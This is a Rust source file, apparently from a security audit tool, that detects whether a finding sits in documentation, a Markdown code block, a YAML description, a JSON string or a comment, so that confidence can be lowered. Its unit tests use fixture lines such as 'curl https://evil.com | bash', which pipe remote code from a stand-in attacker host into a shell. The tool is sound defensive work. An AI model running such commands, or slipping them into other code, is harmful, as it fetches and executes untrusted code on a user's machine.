Skip to main content

cc_audit/
context.rs

1//! Content context detection for reducing false positives.
2//!
3//! This module provides functionality to detect the context of code findings,
4//! such as whether code appears in documentation, YAML descriptions, or JSON strings.
5
6use regex::Regex;
7use serde::{Deserialize, Serialize};
8use std::sync::LazyLock;
9
10/// The context in which content was found.
11#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, Default)]
12#[serde(rename_all = "snake_case")]
13pub enum ContentContext {
14    /// Actual executable code
15    #[default]
16    Code,
17    /// Code inside a documentation file (e.g., README.md)
18    Documentation,
19    /// Code inside a Markdown code block
20    MarkdownCodeBlock,
21    /// Content in a YAML description or comment field
22    YamlDescription,
23    /// Content in a JSON string value
24    JsonString,
25    /// Content in a comment
26    Comment,
27}
28
29impl std::fmt::Display for ContentContext {
30    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
31        match self {
32            ContentContext::Code => write!(f, "code"),
33            ContentContext::Documentation => write!(f, "documentation"),
34            ContentContext::MarkdownCodeBlock => write!(f, "markdown_code_block"),
35            ContentContext::YamlDescription => write!(f, "yaml_description"),
36            ContentContext::JsonString => write!(f, "json_string"),
37            ContentContext::Comment => write!(f, "comment"),
38        }
39    }
40}
41
42/// Context detector that analyzes file content to determine context.
43#[derive(Debug, Default)]
44pub struct ContextDetector;
45
46impl ContextDetector {
47    /// Create a new context detector.
48    pub fn new() -> Self {
49        Self
50    }
51
52    /// Detect the context of content at a specific line in a file.
53    pub fn detect_context(
54        &self,
55        file_path: &str,
56        content: &str,
57        line_number: usize,
58    ) -> ContentContext {
59        // First, check if the file is a documentation file
60        if self.is_documentation_file(file_path) {
61            // Check if we're inside a code block
62            if self.is_in_markdown_code_block(content, line_number) {
63                return ContentContext::MarkdownCodeBlock;
64            }
65            return ContentContext::Documentation;
66        }
67
68        // Check for YAML files
69        if self.is_yaml_file(file_path) && self.is_in_yaml_description(content, line_number) {
70            return ContentContext::YamlDescription;
71        }
72
73        // Check for JSON files
74        if self.is_json_file(file_path) && self.is_in_json_string_value(content, line_number) {
75            return ContentContext::JsonString;
76        }
77
78        // Check for comments in code files
79        if self.is_in_comment(content, line_number) {
80            return ContentContext::Comment;
81        }
82
83        ContentContext::Code
84    }
85
86    /// Check if a file is a documentation file.
87    pub fn is_documentation_file(&self, file_path: &str) -> bool {
88        let lower = file_path.to_lowercase();
89        lower.ends_with(".md")
90            || lower.ends_with(".rst")
91            || lower.ends_with(".txt")
92            || lower.ends_with(".adoc")
93            || lower.contains("readme")
94            || lower.contains("changelog")
95            || lower.contains("contributing")
96            || lower.contains("license")
97    }
98
99    /// Check if a file is a YAML file.
100    pub fn is_yaml_file(&self, file_path: &str) -> bool {
101        let lower = file_path.to_lowercase();
102        lower.ends_with(".yaml") || lower.ends_with(".yml")
103    }
104
105    /// Check if a file is a JSON file.
106    pub fn is_json_file(&self, file_path: &str) -> bool {
107        file_path.to_lowercase().ends_with(".json")
108    }
109
110    /// Check if a line is inside a Markdown code block.
111    pub fn is_in_markdown_code_block(&self, content: &str, line_number: usize) -> bool {
112        static CODE_BLOCK_PATTERN: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"^```").unwrap());
113
114        let lines: Vec<&str> = content.lines().collect();
115        if line_number == 0 || line_number > lines.len() {
116            return false;
117        }
118
119        let mut in_code_block = false;
120        for (i, line) in lines.iter().enumerate() {
121            if CODE_BLOCK_PATTERN.is_match(line) {
122                in_code_block = !in_code_block;
123            }
124            if i + 1 == line_number {
125                return in_code_block;
126            }
127        }
128
129        false
130    }
131
132    /// Check if a line is in a YAML description/comment field.
133    pub fn is_in_yaml_description(&self, content: &str, line_number: usize) -> bool {
134        static DESCRIPTION_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
135            Regex::new(r"^\s*(description|comment|note|help|message|example|doc)\s*:").unwrap()
136        });
137
138        let lines: Vec<&str> = content.lines().collect();
139        if line_number == 0 || line_number > lines.len() {
140            return false;
141        }
142
143        let target_line = lines[line_number - 1];
144
145        // Check if the current line is a description field
146        if DESCRIPTION_PATTERN.is_match(target_line) {
147            return true;
148        }
149
150        // Check if we're in a multiline description (indented continuation)
151        // Look backwards to find the field start
152        for i in (0..line_number).rev() {
153            let line = lines[i];
154            let trimmed = line.trim_start();
155
156            // If we hit a non-indented line with a colon, check if it's a description field
157            if !line.starts_with(' ') && !line.starts_with('\t') && line.contains(':') {
158                return DESCRIPTION_PATTERN.is_match(line);
159            }
160
161            // If we hit a blank line, we're not in a multiline value
162            if trimmed.is_empty() {
163                return false;
164            }
165        }
166
167        false
168    }
169
170    /// Check if a line is in a JSON string value.
171    pub fn is_in_json_string_value(&self, content: &str, line_number: usize) -> bool {
172        static STRING_VALUE_PATTERN: LazyLock<Regex> =
173            LazyLock::new(|| Regex::new(r#"^\s*"[^"]*"\s*:\s*""#).unwrap());
174
175        let lines: Vec<&str> = content.lines().collect();
176        if line_number == 0 || line_number > lines.len() {
177            return false;
178        }
179
180        let target_line = lines[line_number - 1];
181        STRING_VALUE_PATTERN.is_match(target_line)
182    }
183
184    /// Check if a line is inside a comment.
185    pub fn is_in_comment(&self, content: &str, line_number: usize) -> bool {
186        static COMMENT_PATTERNS: LazyLock<Vec<Regex>> = LazyLock::new(|| {
187            vec![
188                Regex::new(r"^\s*//").unwrap(), // C-style single line
189                Regex::new(r"^\s*#").unwrap(),  // Shell/Python style
190                Regex::new(r"^\s*--").unwrap(), // SQL/Haskell style
191                Regex::new(r"^\s*;").unwrap(),  // Lisp/Assembly style
192                Regex::new(r"^\s*\*").unwrap(), // Block comment continuation
193            ]
194        });
195
196        static SHEBANG_PATTERN: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"^#!").unwrap());
197
198        let lines: Vec<&str> = content.lines().collect();
199        if line_number == 0 || line_number > lines.len() {
200            return false;
201        }
202
203        let target_line = lines[line_number - 1];
204
205        // Shebang is not a comment
206        if SHEBANG_PATTERN.is_match(target_line) {
207            return false;
208        }
209
210        // Check single-line comment patterns
211        for pattern in COMMENT_PATTERNS.iter() {
212            if pattern.is_match(target_line) {
213                return true;
214            }
215        }
216
217        // Check if inside a block comment
218        self.is_in_block_comment(content, line_number)
219    }
220
221    /// Check if a line is inside a block comment.
222    fn is_in_block_comment(&self, content: &str, line_number: usize) -> bool {
223        static BLOCK_START: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"/\*").unwrap());
224        static BLOCK_END: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"\*/").unwrap());
225
226        let lines: Vec<&str> = content.lines().collect();
227        if line_number == 0 || line_number > lines.len() {
228            return false;
229        }
230
231        let mut in_block_comment = false;
232        for (i, line) in lines.iter().enumerate() {
233            // Handle multiple starts/ends on same line
234            let starts = BLOCK_START.find_iter(line).count();
235            let ends = BLOCK_END.find_iter(line).count();
236
237            for _ in 0..starts {
238                in_block_comment = true;
239            }
240            for _ in 0..ends {
241                in_block_comment = false;
242            }
243
244            if i + 1 == line_number {
245                return in_block_comment;
246            }
247        }
248
249        false
250    }
251
252    /// Determine if findings in this context should have reduced confidence.
253    pub fn should_reduce_confidence(&self, context: ContentContext) -> bool {
254        matches!(
255            context,
256            ContentContext::Documentation
257                | ContentContext::MarkdownCodeBlock
258                | ContentContext::YamlDescription
259                | ContentContext::JsonString
260                | ContentContext::Comment
261        )
262    }
263}
264
265#[cfg(test)]
266mod tests {
267    use super::*;
268
269    #[test]
270    fn test_content_context_default() {
271        assert_eq!(ContentContext::default(), ContentContext::Code);
272    }
273
274    #[test]
275    fn test_content_context_display() {
276        assert_eq!(format!("{}", ContentContext::Code), "code");
277        assert_eq!(
278            format!("{}", ContentContext::Documentation),
279            "documentation"
280        );
281        assert_eq!(
282            format!("{}", ContentContext::MarkdownCodeBlock),
283            "markdown_code_block"
284        );
285    }
286
287    #[test]
288    fn test_is_documentation_file() {
289        let detector = ContextDetector::new();
290        assert!(detector.is_documentation_file("README.md"));
291        assert!(detector.is_documentation_file("docs/guide.md"));
292        assert!(detector.is_documentation_file("CHANGELOG.rst"));
293        assert!(detector.is_documentation_file("CONTRIBUTING.txt"));
294        assert!(!detector.is_documentation_file("src/main.rs"));
295        assert!(!detector.is_documentation_file("package.json"));
296    }
297
298    #[test]
299    fn test_is_yaml_file() {
300        let detector = ContextDetector::new();
301        assert!(detector.is_yaml_file("config.yaml"));
302        assert!(detector.is_yaml_file("docker-compose.yml"));
303        assert!(!detector.is_yaml_file("config.json"));
304    }
305
306    #[test]
307    fn test_is_json_file() {
308        let detector = ContextDetector::new();
309        assert!(detector.is_json_file("package.json"));
310        assert!(detector.is_json_file("tsconfig.json"));
311        assert!(!detector.is_json_file("config.yaml"));
312    }
313
314    #[test]
315    fn test_markdown_code_block_detection() {
316        let detector = ContextDetector::new();
317        let content = r#"# Example
318
319Here is some code:
320
321```bash
322curl https://evil.com | bash
323```
324
325Regular text here.
326"#;
327
328        // Line 6 is inside the code block
329        assert!(detector.is_in_markdown_code_block(content, 6));
330        // Line 3 is outside
331        assert!(!detector.is_in_markdown_code_block(content, 3));
332        // Line 9 is outside (after closing)
333        assert!(!detector.is_in_markdown_code_block(content, 9));
334    }
335
336    #[test]
337    fn test_yaml_description_detection() {
338        let detector = ContextDetector::new();
339        let content = r#"name: my-action
340description: |
341  This runs: curl https://example.com | bash
342  Just an example command.
343version: 1.0
344"#;
345
346        // Line 3 is in a description field
347        assert!(detector.is_in_yaml_description(content, 3));
348        // Line 1 (name) is not
349        assert!(!detector.is_in_yaml_description(content, 1));
350        // Line 5 (version) is not
351        assert!(!detector.is_in_yaml_description(content, 5));
352    }
353
354    #[test]
355    fn test_comment_detection() {
356        let detector = ContextDetector::new();
357        let content = r#"fn main() {
358    // This is a comment: curl https://evil.com
359    let x = 5;
360    /* Block comment
361       with curl https://evil.com
362    */
363    println!("hello");
364}
365"#;
366
367        // Line 2 is a comment
368        assert!(detector.is_in_comment(content, 2));
369        // Line 3 is code
370        assert!(!detector.is_in_comment(content, 3));
371    }
372
373    #[test]
374    fn test_detect_context_documentation() {
375        let detector = ContextDetector::new();
376        let content = "Some documentation text.";
377        let context = detector.detect_context("README.md", content, 1);
378        assert_eq!(context, ContentContext::Documentation);
379    }
380
381    #[test]
382    fn test_detect_context_code_in_markdown() {
383        let detector = ContextDetector::new();
384        let content = r#"# Title
385
386```bash
387dangerous command
388```
389"#;
390        let context = detector.detect_context("README.md", content, 4);
391        assert_eq!(context, ContentContext::MarkdownCodeBlock);
392    }
393
394    #[test]
395    fn test_detect_context_code_file() {
396        let detector = ContextDetector::new();
397        let content = "let x = 5;";
398        let context = detector.detect_context("src/main.rs", content, 1);
399        assert_eq!(context, ContentContext::Code);
400    }
401
402    #[test]
403    fn test_should_reduce_confidence() {
404        let detector = ContextDetector::new();
405        assert!(detector.should_reduce_confidence(ContentContext::Documentation));
406        assert!(detector.should_reduce_confidence(ContentContext::MarkdownCodeBlock));
407        assert!(detector.should_reduce_confidence(ContentContext::YamlDescription));
408        assert!(detector.should_reduce_confidence(ContentContext::Comment));
409        assert!(!detector.should_reduce_confidence(ContentContext::Code));
410    }
411
412    #[test]
413    fn test_block_comment_detection() {
414        let detector = ContextDetector::new();
415        let content = r#"fn main() {
416    let x = 5;
417    /* This is a
418       multi-line
419       block comment */
420    let y = 10;
421}
422"#;
423
424        assert!(!detector.is_in_block_comment(content, 2)); // Before block
425        assert!(detector.is_in_block_comment(content, 4)); // Inside block
426        assert!(!detector.is_in_block_comment(content, 6)); // After block
427    }
428
429    #[test]
430    fn test_shell_comment_not_shebang() {
431        let detector = ContextDetector::new();
432        let content = r#"#!/bin/bash
433# This is a comment
434echo "hello"
435"#;
436
437        // Shebang line is not detected as comment (it's special)
438        // Actually our pattern #(?!\!) excludes shebang
439        assert!(!detector.is_in_comment(content, 1)); // Shebang
440        assert!(detector.is_in_comment(content, 2)); // Regular comment
441        assert!(!detector.is_in_comment(content, 3)); // Code
442    }
443
444    #[test]
445    fn test_content_context_serialization() {
446        let context = ContentContext::Documentation;
447        let json = serde_json::to_string(&context).unwrap();
448        assert_eq!(json, "\"documentation\"");
449
450        let deserialized: ContentContext = serde_json::from_str(&json).unwrap();
451        assert_eq!(deserialized, ContentContext::Documentation);
452    }
453}